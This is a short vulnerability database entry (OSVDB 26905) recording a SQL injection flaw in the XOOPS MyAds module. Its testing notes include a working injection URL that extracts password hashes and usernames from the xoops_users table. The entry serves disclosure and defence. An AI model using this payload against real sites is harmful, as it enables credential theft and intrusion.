XOOPS MyAds Module annonces-p-f.php lid Variable SQL Injection

2006-06-28T07:18:59
ID OSVDB:26905
Type osvdb
Reporter OSVDB
Modified 2006-06-28T07:18:59

Description

Manual Testing Notes

http://[target]/modules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1,1/*

References:

Vendor URL: http://www.xoops.org/
Secunia Advisory ID: 20882
ISS X-Force ID: 27455
Generic Exploit URL: http://milw0rm.com/exploits/1961
FrSIRT Advisory: ADV-2006-2591
CVE-2006-3341
Bugtraq ID: 18718